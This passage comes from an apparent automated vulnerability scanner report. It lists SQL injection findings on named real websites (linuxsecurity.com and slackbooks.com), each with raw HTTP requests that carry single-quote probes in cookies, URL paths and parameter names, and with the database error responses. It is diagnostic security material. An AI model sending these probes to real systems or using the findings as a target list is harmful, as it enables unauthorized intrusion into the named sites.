Content-Length: 49614

<?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999
...[SNIP]...
<a href="http://www.linuxsecurity.com/content/view/154306/">Ubuntu: 1058-1: PostgreSQL vulnerability</a>
...[SNIP]...

1.44. http://www.linuxsecurity.com/advisories/ [__utmc cookie]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.linuxsecurity.com
Path:   /advisories/

Issue detail

The __utmc cookie appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the __utmc cookie, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be PostgreSQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /advisories/ HTTP/1.1
Host: www.linuxsecurity.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 473097ac08cef5345a0ef7ef35a119cd=-; __utmz=137231789.1296945319.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/23; __utma=137231789.34780583.1296945313.1296945313.1296945313.1; __utmc=137231789'; __utmb=137231789.1.10.1296945313;

Response (redirected)

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:03:11 GMT
Server: Apache
X-Powered-By: PHP/4.4.7
Set-Cookie: 473097ac08cef5345a0ef7ef35a119cd=e7605e0456870a85b25d7c6f67a8ff97; path=/
Set-Cookie: mosvisitor=1
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Sat, 05 Feb 2011 23:03:12 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 49614

<?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999
...[SNIP]...
<a href="http://www.linuxsecurity.com/content/view/154306/">Ubuntu: 1058-1: PostgreSQL vulnerability</a>
...[SNIP]...

1.45. http://www.linuxsecurity.com/advisories/ [__utmz cookie]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.linuxsecurity.com
Path:   /advisories/

Issue detail

The __utmz cookie appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the __utmz cookie, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be PostgreSQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /advisories/ HTTP/1.1
Host: www.linuxsecurity.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 473097ac08cef5345a0ef7ef35a119cd=-; __utmz=137231789.1296945319.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/23'; __utma=137231789.34780583.1296945313.1296945313.1296945313.1; __utmc=137231789; __utmb=137231789.1.10.1296945313;

Response (redirected)

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:03:00 GMT
Server: Apache
X-Powered-By: PHP/4.4.7
Set-Cookie: 473097ac08cef5345a0ef7ef35a119cd=5510f9306ce58bbf0156cb7b35502dae; path=/
Set-Cookie: mosvisitor=1
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Sat, 05 Feb 2011 23:03:01 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 49614

<?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999
...[SNIP]...
<a href="http://www.linuxsecurity.com/content/view/154306/">Ubuntu: 1058-1: PostgreSQL vulnerability</a>
...[SNIP]...

1.46. http://www.linuxsecurity.com/advisories/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.linuxsecurity.com
Path:   /advisories/

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be PostgreSQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /advisories/?1'=1 HTTP/1.1
Host: www.linuxsecurity.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 22:06:53 GMT
Server: Apache
X-Powered-By: PHP/4.4.7
Set-Cookie: 473097ac08cef5345a0ef7ef35a119cd=-; path=/
Set-Cookie: mosvisitor=1
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Sat, 05 Feb 2011 22:06:54 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 49614

<?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999
...[SNIP]...
<a href="http://www.linuxsecurity.com/content/view/154306/">Ubuntu: 1058-1: PostgreSQL vulnerability</a>
...[SNIP]...

1.47. http://www.slackbooks.com/Athletic+Training [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.slackbooks.com
Path:   /Athletic+Training

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /Athletic+Training' HTTP/1.1
Host: www.slackbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=164007549.1296944200.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=164007549.371423654.1296944200.1296944200.1296944200.1; __utma_a2a=2564089484.1328501126.1296944200.1296944200.1296944213.2; __utmc=164007549; __utmb=164007549; ASP.NET_SessionId=g4ffc1a3nyrr0w55myx2al55;

Response 1

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 06 Feb 2011 16:56:52 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 10059

<html>
<head>
<title>Unclosed quotation mark before the character string 'athletic+training''.<br>Line 1: Incorrect syntax near 'athletic+training''.</title>
<style>
b
...[SNIP]...

Request 2

GET /Athletic+Training'' HTTP/1.1
Host: www.slackbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=164007549.1296944200.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=164007549.371423654.1296944200.1296944200.1296944200.1; __utma_a2a=2564089484.1328501126.1296944200.1296944200.1296944213.2; __utmc=164007549; __utmb=164007549; ASP.NET_SessionId=g4ffc1a3nyrr0w55myx2al55;

Response 2

HTTP/1.1 404 Not Found
Connection: close
Date: Sun, 06 Feb 2011 16:56:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 12000


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<!--
Site Name: Slackbooks.com
-->

<html xmlns="http://www.w3.org/
...[SNIP]...

1.48. http://www.slackbooks.com/Manual+Therapy [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.slackbooks.com
Path:   /Manual+Therapy

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /Manual+Therapy' HTTP/1.1
Host: www.slackbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=164007549.1296944200.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=164007549.371423654.1296944200.1296944200.1296944200.1; __utma_a2a=2564089484.1328501126.1296944200.1296944200.1296944213.2; __utmc=164007549; __utmb=164007549; ASP.NET_SessionId=g4ffc1a3nyrr0w55myx2al55;

Response 1

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 06 Feb 2011 16:59:45 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 10029

<html>
<head>
<title>Unclosed quotation mark before the character string 'manual+therapy''.<br>Line 1: Incorrect syntax near 'manual+therapy''.</title>
<style>
body {f
...[SNIP]...

Request 2

GET /Manual+Therapy'' HTTP/1.1
Host: www.slackbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=164007549.1296944200.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=164007549.371423654.1296944200.1296944200.1296944200.1; __utma_a2a=2564089484.1328501126.1296944200.1296944200.1296944213.2; __utmc=164007549; __utmb=164007549; ASP.NET_SessionId=g4ffc1a3nyrr0w55myx2al55;

Response 2

HTTP/1.1 404 Not Found
Connection: close
Date: Sun, 06 Feb 2011 16:59:46 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 11990


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<!--
Site Name: Slackbooks.com
-->

<html xmlns="http://www.w3.org/
...[SNIP]...

1.49. http://www.slackbooks.com/Orthotics+and+Prosthetics [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.slackbooks.com
Path:   /Orthotics+and+Prosthetics

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /Orthotics+and+Prosthetics' HTTP/1.1
Host: www.slackbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=164007549.1296944200.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=164007549.371423654.1296944200.1296944200.1296944200.1; __utma_a2a=2564089484.1328501126.1296944200.1296944200.1296944213.2; __utmc=164007549; __utmb=164007549; ASP.NET_SessionId=g4ffc1a3nyrr0w55myx2al55;

Response 1

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 06 Feb 2011 17:00:38 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 10139

<html>
<head>
<title>Unclosed quotation mark before the character string 'orthotics+and+prosthetics''.<br>Line 1: Incorrect syntax near 'orthotics+and+prosthetics''.</title>
<st
...[SNIP]...

Request 2

GET /Orthotics+and+Prosthetics'' HTTP/1.1
Host: www.slackbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=164007549.1296944200.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=164007549.371423654.1296944200.1296944200.1296944200.1; __utma_a2a=2564089484.1328501126.1296944200.1296944200.1296944213.2; __utmc=164007549; __utmb=164007549; ASP.NET_SessionId=g4ffc1a3nyrr0w55myx2al55;

Response 2

HTTP/1.1 404 Not Found
Connection: close
Date: Sun, 06 Feb 2011 17:00:39 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 12028


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<!--
Site Name: Slackbooks.com
-->

<html xmlns="http://www.w3.org/
...[SNIP]...

1.50. http://www.slackbooks.com/Physical+Therapy [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.slackbooks.com
Path:   /Physical+Therapy

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /Physical+Therapy' HTTP/1.1
Host: www.slackbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=164007549.1296944200.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=164007549.371423654.1296944200.1296944200.1296944200.1; __utma_a2a=2564089484.1328501126.1296944200.1296944200.1296944213.2; __utmc=164007549; __utmb=164007549; ASP.NET_SessionId=g4ffc1a3nyrr0w55myx2al55;

Response 1

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 06 Feb 2011 17:02:10 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 10049

<html>
<head>
<title>Unclosed quotation mark before the character string 'physical+therapy''.<br>Line 1: Incorrect syntax near 'physical+therapy''.</title>
<style>
bod
...[SNIP]...

Request 2

GET /Physical+Therapy'' HTTP/1.1
Host: www.slackbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=164007549.1296944200.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=164007549.371423654.1296944200.1296944200.1296944200.1; __utma_a2a=2564089484.1328501126.1296944200.1296944200.1296944213.2; __utmc=164007549; __utmb=164007549; ASP.NET_SessionId=g4ffc1a3nyrr0w55myx2al55;

Response 2

HTTP/1.1 404 Not Found
Connection: close
Date: Sun, 06 Feb 2011 17:02:11 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 11998


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<!--
Site Name: Slackbooks.com
-->

<html xmlns="http://www.w3.org/
...[SNIP]...

1.51. http://www.slackbooks.com/aclreconstuct [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.slackbooks.com
Path:   /aclreconstuct

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /aclreconstuct' HTTP/1.1
Host: www.slackbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=164007549.1296944200.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=164007549.371423654.1296944200.1296944200.1296944200.1; __utma_a2a=2564089484.1328501126.1296944200.1296944200.1296944213.2; __utmc=164007549; __utmb=164007549; ASP.NET_SessionId=g4ffc1a3nyrr0w55myx2al55;

Response 1

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 06 Feb 2011 16:56:35 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 10019

<html>
<head>
<title>Unclosed quotation mark before the character string 'aclreconstuct''.<br>Line 1: Incorrect syntax near 'aclreconstuct''.</title>
<style>
body {fon
...[SNIP]...

Request 2

GET /aclreconstuct'' HTTP/1.1
Host: www.slackbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=164007549.1296944200.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=164007549.371423654.1296944200.1296944200.1296944200.1; __utma_a2a=2564089484.1328501126.1296944200.1296944200.1296944213.2; __utmc=164007549; __utmb=164007549; ASP.NET_SessionId=g4ffc1a3nyrr0w55myx2al55;

Response 2

HTTP/1.1 404 Not Found
Connection: close
Date: Sun, 06 Feb 2011 16:56:35 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 11988


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<!--
Site Name: Slackbooks.com
-->

<html xmlns="http://www.w3.org/
...[SNIP]...

1.52. http://www.slackbooks.com/aclreconstuct [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.slackbooks.com
Path:   /aclreconstuct

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /aclreconstuct?1'=1 HTTP/1.1
Host: www.slackbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=164007549.1296944200.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=164007549.371423654.1296944200.1296944200.1296944200.1; __utma_a2a=2564089484.1328501126.1296944200.1296944200.1296944213.2; __utmc=164007549; __utmb=164007549; ASP.NET_SessionId=g4ffc1a3nyrr0w55myx2al55;

Response 1

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 06 Feb 2011 16:56:06 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 9884

<html>
<head>
<title>Line 1: Incorrect syntax near '='.<br>Unclosed quotation mark before the character string ''.</title>
<style>
body {font-family:"Verdana";font-wei
...[SNIP]...

Request 2

GET /aclreconstuct?1''=1 HTTP/1.1
Host: www.slackbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=164007549.1296944200.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=164007549.371423654.1296944200.1296944200.1296944200.1; __utma_a2a=2564089484.1328501126.1296944200.1296944200.1296944213.2; __utmc=164007549; __utmb=164007549; ASP.NET_SessionId=g4ffc1a3nyrr0w55myx2al55;

Response 2

HTTP/1.1 404 Not Found
Connection: close
Date: Sun, 06 Feb 2011 16:56:07 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 12002


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<!--
Site Name: Slackbooks.com
-->

<html xmlns="http://www.w3.org/
...[SNIP]...

1.53. http://www.slackbooks.com/ccacl [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.slackbooks.com
Path:   /ccacl

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /ccacl' HTTP/1.1
Host: www.slackbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=164007549.1296944200.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=164007549.371423654.1296944200.1296944200.1296944200.1; __utma_a2a=2564089484.1328501126.1296944200.1296944200.1296944213.2; __utmc=164007549; __utmb=164007549; ASP.NET_SessionId=g4ffc1a3nyrr0w55myx2al55;

Response 1

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 06 Feb 2011 16:57:43 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 9939

<html>
<head>
<title>Unclosed quotation mark before the character string 'ccacl''.<br>Line 1: Incorrect syntax near 'ccacl''.</title>
<style>
body {font-family:"Verdan
...[SNIP]...

Request 2

GET /ccacl'' HTTP/1.1
Host: www.slackbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=164007549.1296944200.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=164007549.371423654.1296944200.1296944200.1296944200.1; __utma_a2a=2564089484.1328501126.1296944200.1296944200.1296944213.2; __utmc=164007549; __utmb=164007549; ASP.NET_SessionId=g4ffc1a3nyrr0w55myx2al55;

Response 2

HTTP/1.1 404 Not Found
Connection: close
Date: Sun, 06 Feb 2011 16:57:44 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 11960


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<!--
Site Name: Slackbooks.com
-->

<html xmlns="http://www.w3.org/
...[SNIP]...

1.54. http://www.slackbooks.com/ccacl [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.slackbooks.com
Path:   /ccacl

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /ccacl?1'=1 HTTP/1.1
Host: www.slackbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=164007549.1296944200.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=164007549.371423654.1296944200.1296944200.1296944200.1; __utma_a2a=2564089484.1328501126.1296944200.1296944200.1296944213.2; __utmc=164007549; __utmb=164007549; ASP.NET_SessionId=g4ffc1a3nyrr0w55myx2al55;

Response 1

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 06 Feb 2011 16:57:12 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 9884

<html>
<head>
<title>Line 1: Incorrect syntax near '='.<br>Unclosed quotation mark before the character string ''.</title>
<style>
body {font-family:"Verdana";font-wei
...[SNIP]...

Request 2

GET /ccacl?1''=1 HTTP/1.1
Host: www.slackbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=164007549.1296944200.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=164007549.371423654.1296944200.1296944200.1296944200.1; __utma_a2a=2564089484.1328501126.1296944200.1296944200.1296944213.2; __utmc=164007549; __utmb=164007549; ASP.NET_SessionId=g4ffc1a3nyrr0w55myx2al55;

Response 2

HTTP/1.1 404 Not Found
Connection: close
Date: Sun, 06 Feb 2011 16:57:12 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 11974


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<!--
Site Name: Slackbooks.com
-->

<html xmlns="http://www.w3.org/
...[SNIP]...

1.55. http://www.slackbooks.com/ccknee [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.slackbooks.com
Path:   /ccknee

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /ccknee' HTTP/1.1
Host: www.slackbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=164007549.1296944200.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=164007549.371423654.1296944200.1296944200.1296944200.1; __utma_a2a=2564089484.1328501126.1296944200.1296944200.1296944213.2; __utmc=164007549; __utmb=164007549; ASP.NET_SessionId=g4ffc1a3nyrr0w55myx2al55;

Response 1

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 06 Feb 2011 16:57:55 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 9949

<html>
<head>
<title>Unclosed quotation mark before the character string 'ccknee''.<br>Line 1: Incorrect syntax near 'ccknee''.</title>
<style>
body {font-family:"Verd
...[SNIP]...

Request 2

GET /ccknee'' HTTP/1.1
Host: www.slackbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=164007549.1296944200.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=164007549.371423654.1296944200.1296944200.1296944200.1; __utma_a2a=2564089484.1328501126.1296944200.1296944200.1296944213.2; __utmc=164007549; __utmb=164007549; ASP.NET_SessionId=g4ffc1a3nyrr0w55myx2al55;

Response 2

HTTP/1.1 404 Not Found
Connection: close
Date: Sun, 06 Feb 2011 16:57:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 11962


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<!--
Site Name: Slackbooks.com
-->

<html xmlns="http://www.w3.org/
...[SNIP]...

1.56. http://www.slackbooks.com/ccknee [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.slackbooks.com
Path:   /ccknee

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

